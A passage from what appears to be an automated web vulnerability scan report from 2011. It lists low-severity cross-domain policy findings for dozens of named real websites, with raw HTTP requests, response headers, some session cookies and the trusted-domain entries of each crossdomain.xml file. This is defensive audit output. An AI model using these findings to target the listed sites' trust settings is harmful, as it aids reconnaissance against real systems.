<allow-access-from domain="www.acropolisslots.com" />
<allow-access-from domain="www.acropolisslots.co.uk" />
<allow-access-from domain="www.acropolislots.com" />
<allow-access-from domain="www.acropolislots.co.uk" />
<allow-access-from domain="www.acropolis-slots.com" />
<allow-access-from domain="www.acropolis-slots.co.uk" />
<allow-access-from domain="www.stanleys-slots.com" />
<allow-access-from domain="www.stanleys-slots.co.uk" />
<allow-access-from domain="www.stanley-slots.com" />
<allow-access-from domain="www.stanley-slots.co.uk" />
<allow-access-from domain="www.slotsclub.co.uk" />
<allow-access-from domain="www.clubslots.co.uk" />
<allow-access-from domain="www.skypalmscasino.com" />
<allow-access-from domain="www.skybreezescasino.com" />
<allow-access-from domain="www.skyjackpot.com" />
<allow-access-from domain="www.skykingscasino.com" />
<allow-access-from domain="www.casinocity.com" />
<allow-access-from domain="online.casinocity.com" />
<allow-access-from domain="ads.casinocity.com" />
<allow-access-from domain="as1.casinocity.com" />
<allow-access-from domain="*.centrebet.com" />
<allow-access-from domain="*.centrebet.co.uk" />
<allow-access-from domain="*.iberapuesta.com" />
<allow-access-from domain="*.videobet.com" />
<allow-access-from domain="*.winajackpot.com" />
<allow-access-from domain="*.playtech.ph" />
...[SNIP]...

7.213. http://www.portableairshop.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.portableairshop.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.portableairshop.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:39 GMT
Server: Apache
Content-Length: 224
Cache-Control: public;max-age=86400
Expires: Wed, 04 May 2011 10:28:39 GMT
Last-Modified: Wed, 27 Apr 2011 17:51:02 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.YourSiteDomain.com" />
...[SNIP]...

7.214. http://www.raylamontagne.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.raylamontagne.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.raylamontagne.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:43 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 13 Oct 2010 15:49:28 GMT
ETag: "38589d-297-4928189d95200"
Accept-Ranges: bytes
Content-Length: 663
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sonymusic.com" />
<allow-access-from domain="sonymusic.com" />
<allow-access-from domain="*.columbiarecords.com" />
<allow-access-from domain="columbiarecords.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.google-analytics.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="windows.dev.boffswana.com.au" />
<allow-access-from domain="*.britneyvideogame.com" />
...[SNIP]...

7.215. http://www.realbird.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.realbird.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realbird.com

Response

HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/xml
Last-Modified: Mon, 26 Jan 2009 01:09:49 GMT
Accept-Ranges: bytes
ETag: "bcabec9527fc91:2a1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR CUR ADM DEV OUR NOR STA"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.216. http://www.reflector.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reflector.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reflector.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:23:20 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=ccb532668485f886a3f810b14172a4c4; expires=Thu, 26-May-2011 13:54:01 GMT; path=/; domain=.reflector.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 10:20:41 GMT
Cache-Control: no-cache
Content-Length: 269
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.reflector.com" />
<allow-access-from domain="*.www.reflector.com" />
...[SNIP]...

7.217. http://www.ryland.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ryland.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ryland.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:21:30 GMT
Accept-Ranges: bytes
ETag: "0a9d4bfd7fecb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=7HLLwhJAzAEkAAAAZTdhMjNiYWUtZWRmOC00MzI4LTk4ZGItNjIxZTg1ODJmY2FiPeO2Mn30VwCXkRzFPRLl4cTvPfY1; domain=www.ryland.com; expires=Mon, 11-Jul-2011 21:37:40 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:40 GMT
Connection: close
Content-Length: 519

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="localhost" />
   <allow-access-from domain="*.loc.ryland.com" />
   <allow-access-from domain="*.ryland.com" />
   <allow-access-from domain="*.rylandespanol.com" />
   <allow-access-from domain="*.rylandpower.com" />
   <allow-access-from domain="*.rylandmove.com" />
   <allow-access-from domain="www.medialab3dstudio.com" />
...[SNIP]...

7.218. http://www.samashmusic.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.samashmusic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.samashmusic.com

Response

HTTP/1.1 200 OK
Content-Length: 424
Content-Type: text/xml
Last-Modified: Mon, 22 Dec 2008 23:59:56 GMT
Accept-Ranges: bytes
ETag: "834311649164c91:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.samashmusic.com" secur
...[SNIP]...
<allow-access-from domain="*.samashmusic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.samash.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.samash.com" secure="false"/>
...[SNIP]...

7.219. http://www.saukvalley.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.saukvalley.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.saukvalley.com

Response

HTTP/1.0 200 OK
Vary: Cookie, User-Agent
Server: Roxen/4.5.241-release4
ETag: "effff9db19f6fd79e0766f5c7cc16797"
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2008 11:02:36 GMT
Date: Tue, 03 May 2011 11:06:39 GMT
Expires: Mon, 03 May 2010 05:06:39 GMT
Connection: close
Content-Length: 552
Content-Type: text/xml; charset=ISO-8859-1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nwherald.com" />
<allow-access-from domain="*.chitownburbs.com" />
<allow-access-from domain="*.kcchronicle.com" />
<allow-access-from domain="*.mchenrycountysports.com" />
<allow-access-from domain="*.weeklyjournals.com" />
<allow-access-from domain="*.lakecountyjournals.com" />
<allow-access-from domain="*.elconquistadornews.com" />
...[SNIP]...

7.220. http://www.schuelervz.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.schuelervz.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.schuelervz.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:51 GMT
Content-Type: application/xml
Connection: close
Server: Apache
Last-Modified: Sun, 05 Dec 2010 17:02:04 GMT
ETag: "7ca0fd-224-4cfbc58c"
Accept-Ranges: bytes
Content-Length: 548
X-Frontend: nothing

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*.schuelervz.net" />
<allow-access-from domain="*.studieren-in-fernost.de" />
<allow-access-from domain="*.studblog.aperto.de" />
<allow-access-from domain="*.studivz.net" />
<allow-access-from domain="*.apivz.net" />
...[SNIP]...

7.221. http://www.sleepconnect.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sleepconnect.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sleepconnect.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
ETag: "cf64b7c08eb1e296a9b04bc83d270c86"
X-Runtime: 7
Content-Length: 348
Set-Cookie: _tk=BAh7AA%3D%3D--e95288a5adac97260428dac777177ecbcfcb06dc; domain=.sleepconnect.com; path=/; expires=Thu, 02-Jun-2011 10:19:48 GMT
Set-Cookie: _alliance_health_session=BAh7BzoOd29ya2Zsb3dzewA6D3Nlc3Npb25faWQiJWIxZTM1MGEyZDU3MWM0ZGM5ODE1MjZlZjdkNzhkMTg2--013982c475092896a6776c927ecbe5a1404dba72; domain=.sleepconnect.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.54 + Phusion Passenger 3.0.6 (mod_rails/mod_rack)

<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain='*.www.sleepconnect.com'>
...[SNIP]...

7.222. http://www.socializr.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.socializr.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.socializr.com

Response

HTTP/1.1 200 OK
ETag: W/"220-1300745892000"
Last-Modified: Mon, 21 Mar 2011 22:18:12 GMT
Content-Type: application/xml
Content-Length: 220
Date: Tue, 03 May 2011 11:09:05 GMT
Connection: close
Server: Commodore 64 HTTPD

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.socializr.com" />
   <allow-access-from domain="*.socializrtest.com" />
   <allow-access-from domain="*.meebo.com" />
</cr
...[SNIP]...

7.223. http://www.spankwireinhd.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.spankwireinhd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spankwireinhd.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 27 Jul 2009 17:50:30 GMT
ETag: "806000e-11b-46fb396ff8580"
Accept-Ranges: bytes
Content-Length: 283
ServerID: www6
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.moviebox.com" />
<allow-access-from domain="*.dvdcdn.com" />
...[SNIP]...

7.224. http://www.sub5zero.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sub5zero.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sub5zero.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 01 May 2010 06:17:28 GMT
ETag: "289f4e-237-5066ce00"
Accept-Ranges: bytes
Content-Length: 567
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:26:04 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="localhost"/>
<allow-access-from domain="127.0.0.1"/>
<allow-access-from domain="*.kaltura.com"/>
...[SNIP]...

7.225. http://www.superstreetonline.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.superstreetonline.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.superstreetonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:32:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4fjal35505jcl0fzkjqyte55; path=/; HttpOnly
Set-Cookie: UserPuid=2317514194315828702; domain=superstreetonline.com; expires=Tue, 03-May-2061 10:32:15 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.226. http://www.swvatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.swvatoday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swvatoday.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 13 Aug 2009 11:37:04 GMT
ETag: "578196-273-471045acc7800"
Accept-Ranges: bytes
Content-Length: 627
Keep-Alive: timeout=2, max=150
Connection: close
Content-Type: text/xml

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.mgnetwork.com"/>
...[SNIP]...
<allow-access-from domain="*.mgnetwork.net"/>
...[SNIP]...
<allow-access-from domain="*.themeganet.com"/>
...[SNIP]...

7.227. http://www.targetcenter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.targetcenter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.targetcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 371
Content-Type: text/xml
Last-Modified: Thu, 22 Jan 2009 16:40:22 GMT
Accept-Ranges: bytes
ETag: "63ef451eb07cc91:67be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:05:47 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.greenhousecms.com" />
<allow-access-from domain="216.54.207.65" />
<allow-access-from domain="*.vostok1server.com" /><allow-access-from domain="*.carbonhouse.com" /><allow-access-from domain="*.targetcenter.com" />
<allow-access-from domain="*.ncrpmreports.com" />
...[SNIP]...

7.228. http://www.tbd.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tbd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tbd.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:28:04 GMT
ETag: "18b9084-145-4a1c4e1fda100"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Tue, 03 May 2011 10:26:44 GMT
Date: Tue, 03 May 2011 10:26:34 GMT
Content-Length: 325
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

7.229. http://www.the39clues.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.the39clues.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.the39clues.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 10:16:53 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Fri, 01 Oct 2010 13:20:09 GMT
ETag: "7091b-19b-4918e0dc15440"
Accept-Ranges: bytes
Content-Length: 411

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.the39clues.com" />
...[SNIP]...

7.230. http://www.thefwa.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefwa.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefwa.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 17 Feb 2010 15:50:23 GMT
ETag: "287da-73-cee54dc0"
Accept-Ranges: bytes
Content-Length: 115
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.thefwa.com" />
</cross-domain-policy>

7.231. http://www.trade2win.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.trade2win.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trade2win.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:10 GMT
Server: Apache
Last-Modified: Tue, 17 Jun 2008 14:24:14 GMT
Accept-Ranges: bytes
Content-Length: 357
SFARM: panna
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.trade2win.com" />
<allow-access-from domain="*.t2w.com" />
<allow-access-from domain="*.trade2win.co.uk" />
<allow-access-from domain="*.t2w.co.uk" />
...[SNIP]...

7.232. http://www.tradearca.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tradearca.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:42 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 21 Sep 2009 15:20:44 GMT
ETag: "93c18316cf3aca1:da2"
Content-Length: 159

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.nyse.com" />
<allow-access-from domain="*.nyx.com" />
</cross-domain-policy>

7.233. http://www.ualmileageplus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ualmileageplus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ualmileageplus.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:27:58 GMT
Server: Microsoft-IIS/6.0
Content-type: text/plain
Last-modified: Mon, 03 May 2010 12:31:16 GMT
Content-length: 405
Accept-ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="*.edeal.com" />
   <allow-access-from domain="*.at.edeal.com" />
   <allow-access-from domain="*.truition.com" />
   <allow-access-from domain="aws.truition.com" />
   <allow-access-from domain="*.nhl.com" />
   <allow-access-from domain="*.chase.com" />
...[SNIP]...

7.234. http://www.uniqlo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.uniqlo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uniqlo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 01 Dec 2010 23:34:00 GMT
ETag: "182919-349-bd5faa00"
Accept-Ranges: bytes
Content-Length: 841
Content-Type: text/xml
Date: Tue, 03 May 2011 10:31:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.uniqlo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.uniqlo.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="10.202.3.28" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ebook.shufoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.shufoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sonicjam.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="128.121.152.141" secure="false" />
...[SNIP]...
<allow-access-from domain="here.bascule.co.jp" />
<allow-access-from domain="imgsrc.vo.llnwd.net" />
<allow-access-from domain="*.imgsrc.co.jp" />
<allow-access-from domain="uniqlo.edgesuite.net" />
...[SNIP]...

7.235. http://www.urbanministry.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.urbanministry.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.urbanministry.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 PHP/5.2.16
Last-Modified: Tue, 05 May 2009 16:29:36 GMT
ETag: "4ac7111-237-4692cc8d93c00"
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:54:11 GMT
P3P: CP="HONK"
Content-Type: application/xml
Content-Length: 567
X-Request-URL: /crossdomain.xml
X-TTL-Extend: YES
X-Extended-TTL: 7d
Date: Tue, 03 May 2011 10:31:24 GMT
X-Varnish: 969512336 968906180
Age: 121034
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 22

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="localhost"/>
<allow-access-from domain="127.0.0.1"/>
<allow-access-from domain="*.kaltura.com"/>
...[SNIP]...

7.236. http://www.usa-gymnastics.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usa-gymnastics.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usa-gymnastics.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 15 Mar 2010 17:30:39 GMT
ETag: "38ae08-1bb-3d59edc0"
Accept-Ranges: bytes
Content-Length: 443
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usa-gymnastics.org" />
<allow-access-from domain="*.usagym.org" />
<allow-access-from domain="*.myusagym.com" />
<allow-access-from domain="usa-gymnastics.org" />
<allow-access-from domain="usagym.org" />
<allow-access-from domain="myusagym.com" />
...[SNIP]...

7.237. http://www.usafootball.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usafootball.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usafootball.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:13 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSa94fbadc2a7bd2ea6f231c4262a25eb1=c18jpu62ttp7tvimfihhabgim6; expires=Thu, 26-May-2011 13:55:33 GMT; path=/; domain=.usafootball.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:22:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 273
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.usafootball.com" />
<allow-access-from domain="*.www.usafootball.com" />
...[SNIP]...

7.238. http://www.usfunds.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usfunds.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usfunds.com

Response

HTTP/1.1 200 OK
Content-Length: 359
Content-Type: text/xml
Content-Location: http://www.usfunds.com/crossdomain.xml
Last-Modified: Fri, 28 Aug 2009 18:47:51 GMT
Accept-Ranges: bytes
ETag: "245a86b1028ca1:19c0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="hr.company.com" />
   <allow-access-from domain="*.usfunds.com" />
   <allow-access-from domain="*.us-global.com" />
